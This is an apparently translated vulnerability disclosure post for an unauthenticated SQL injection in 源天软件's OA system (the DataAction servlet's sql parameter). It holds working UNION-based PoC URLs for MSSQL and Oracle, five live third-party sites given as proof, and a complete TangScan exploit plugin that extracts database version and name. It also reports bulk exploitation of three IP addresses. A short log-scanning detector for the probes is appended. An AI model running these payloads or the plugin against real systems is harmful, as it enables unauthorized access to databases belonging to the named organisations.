First: supporting TangScan.com is a must. Second: throwing out a 0day to go with the plugin. Last: looking at the sky tonight, it seems rain is on the way; wonder if there will be thunder~~~
1) Generic SQL injection vulnerability
Vendor: 源天软件
Website: http://www.visionsoft.com.cn/
Vulnerable path: ServiceAction/com.velcro.base.DataAction
Notes: this OA system runs on either of two database types, MSSQL or Oracle, so the cases below give a PoC for each.
PoC:
MSSQL database: ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id='' and 1=2 union all select @@version&isworkflow=true
Oracle database: ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id='' and 1=2 union all select (select banner from sys.v_$version where rownum=1) from dual&isworkflow=true
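For the defensive side, an added example (not part of the original post, and not TangScan or vendor code): a small access-log scanner that pulls the sql parameter out of requests to the vulnerable servlet, normalises the |20 space encoding the PoCs rely on, and flags the UNION-based version and database-name probes. The log lines and client IPs are constructed, and the set of probe tokens is an assumption drawn from the PoCs above.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Path of the vulnerable servlet named in the disclosure.
ENDPOINT = "/ServiceAction/com.velcro.base.DataAction"

# Tokens taken from the UNION-based MSSQL/Oracle probes above (assumed set);
# the app's own "select categoryids from project where id=..." lacks them.
SUSPICIOUS = re.compile(
    r"\bunion\b|@@version|db_name\s*\(|v_\$version|\bfrom\s+dual\b", re.IGNORECASE
)

# Combined-log-format request line: ip ident user [time] "METHOD target proto"
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\w+) (\S+) [^"]*"')

# Constructed sample access-log lines (not from the original post): lines 1
# and 4 mirror the MSSQL and Oracle PoCs, line 2 is an ordinary lookup.
SAMPLE_LOG = """\
10.0.0.5 - - [22/Jul/2015:10:01:02 +0800] "GET /ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id=%27%27%20and%201=2%20union%20all%20select%20@@version&isworkflow=true HTTP/1.1" 200 512
10.0.0.6 - - [22/Jul/2015:10:01:03 +0800] "GET /ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id=%2742%27&isworkflow=true HTTP/1.1" 200 300
10.0.0.7 - - [22/Jul/2015:10:01:04 +0800] "GET /index.jsp HTTP/1.1" 200 1024
10.0.0.8 - - [22/Jul/2015:10:01:05 +0800] "GET /ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id=%27%27%20and%201=2%20union%20all%20select%20(select%20banner%20from%20sys.v_$version%20where%20rownum=1)%20from%20dual&isworkflow=true HTTP/1.1" 200 600
"""

def decode_sql_param(target):
    """Decoded 'sql' parameter of a request target, or None if not applicable."""
    parts = urlsplit(target)
    if parts.path != ENDPOINT:
        return None
    values = parse_qs(parts.query).get("sql")
    if not values:
        return None
    # The servlet accepts '|20' as an alternative space encoding (see the PoCs),
    # so normalise it after the percent-decoding parse_qs already did.
    return values[0].replace("|20", " ")

def scan_log(text):
    """Return (client_ip, timestamp, decoded_sql) for each probe-shaped request."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, ts, _method, target = m.groups()
        sql = decode_sql_param(target)
        if sql is not None and SUSPICIOUS.search(sql):
            hits.append((ip, ts, sql))
    return hits
```

The token check only catches probe shapes; since the servlet accepts arbitrary SQL in a request parameter without login, restricting or removing that parameter server-side is the actual fix.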
Proof (just open the URL directly):
MSSQL part
A) http://km.best-team.com.cn/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id=%27%27%20and%201=2%20union%20all%20select%20@@version&isworkflow=true
B) http://bms.9square.com.cn/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id=%27%27%20and%201=2%20union%20all%20select%20@@version&isworkflow=true
C) http://oa.jsfuan.com/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id=%27%27%20and%201=2%20union%20all%20select%20@@version&isworkflow=true
Oracle part
D) http://winshare.com.cn/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id='' and 1=2 union all select (select banner from sys.v_$version where rownum=1) from dual&isworkflow=true
E) http://oa.mcds.com/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id=%27%27%20and%201=2%20union%20all%20select%20(select%20banner%20from%20sys.v_$version%20where%20rownum=1)%20from%20dual&isworkflow=true
2) As promised, I came here to support TangScan, so here is the finished plugin code (I'm a code illiterate and just hacked this together; gurus, please don't flame). By the time this is published the plugin will already be in the TangScan.com repository.
#! /usr/bin/env python
# -*- coding: utf-8 -*-

"""
Copyright (c) 2013-2014 TangScan developers (http://www.wooyun.org/)
See the file 'docs/COPYING' for copying permission

author: fate0 <fate0@wooyun.org>
"""

import re

from thirdparty import requests
from modules.exploit import TSExploit


__all__ = ['TangScan']


class TangScan(TSExploit):
    def __init__(self):
        super(self.__class__, self).__init__()
        self.info = {
            "name": "源天软件OA办公系统 sql 注入MSSQL版漏洞(无需登录)",
            "product": "源天",
            "product_version": "",
            "desc": """
                OA办公系统 /ServiceAction/com.velcro.base.DataAction 中的 sql 参数存在注入, 将导致敏感数据泄漏
            """,
            "license": self.license.TS,
            "author": ["Coody"],
            "ref": [
                {self.ref.wooyun: "暂无"},
            ],
            "type": self.type.injection,
            "severity": self.severity.high,
            "privileged": False,
            "disclosure_date": "2015-07-22",
            "create_date": "2015-07-23",
        }

        self.register_option({
            "url": {
                "default": "",
                "required": True,
                "choices": [],
                "convert": self.convert.url_field,
                "desc": "目标 url"
            }
        })

        self.register_result({
            "status": False,
            "data": {
                "db_info": {
                    "version": "",
                    "current_db": ""
                }
            },
            "description": "",
            "error": ""
        })

    def verify(self):
        self.print_debug("verify start")

        # The selected value is echoed back inside a <data> element of the XML response.
        re_version_pattern = re.compile(r'<data>(.+?)</data>', re.IGNORECASE | re.DOTALL | re.MULTILINE)
        exp_url = ("{domain}/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id='' and 1=2 union all select @@version&isworkflow=true".format(domain=self.option.url))

        try:
            response = requests.get(exp_url, timeout=15, verify=False)
        except Exception as e:
            self.result.error = str(e)
            return

        re_result = re_version_pattern.findall(response.content)
        if len(re_result) == 0:
            self.result.status = False
            return

        self.result.status = True
        self.result.data.db_info.version = re_result[0]
        self.result.description = "目标 {url} 存在sql注入, 目标使用数据库版本为: {db_version}".format(
            url=self.option.url,
            db_version=re_result[0]
        )

    def exploit(self):
        self.print_debug("exploit start")

        # Same response format as verify(); the query returns the current database name instead.
        re_userinfo_pattern = re.compile(r'<data>(.+?)</data>', re.IGNORECASE | re.DOTALL | re.MULTILINE)
        exp_url = ("{domain}/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id='' and 1=2 union all select db_name()&isworkflow=true".format(domain=self.option.url))

        try:
            response = requests.get(exp_url, timeout=15, verify=False)
        except Exception as e:
            self.result.error = str(e)
            return

        re_result = re_userinfo_pattern.findall(response.content)
        if len(re_result) == 0:
            self.result.status = False
            return

        self.result.status = True
        self.result.data.db_info.current_db = re_result[0]
        self.result.description = "目标 {url} 存在sql注入, 数据库名称为: {current_db}".format(
            url=self.option.url,
            current_db=self.result.data.db_info.current_db
        )


if __name__ == '__main__':
    from modules.main import main
    main(TangScan())
Here are the results of running the plugin:
Running with --mode verify (the default)
Running with --mode exploit
The plugin runs fine and outputs the data without a hitch......
This is where it should have ended, but I couldn't resist, so here are the results of the batch detection script as well. The sites tested were:
http://60.12.113.234:8080/
http://121.14.195.31:8081/
http://218.246.22.194:8080/
For the test I ran --mode exploit directly to grab the database names in bulk.
Test done; here is the content of the result file success.txt.
Right, that's the end of it···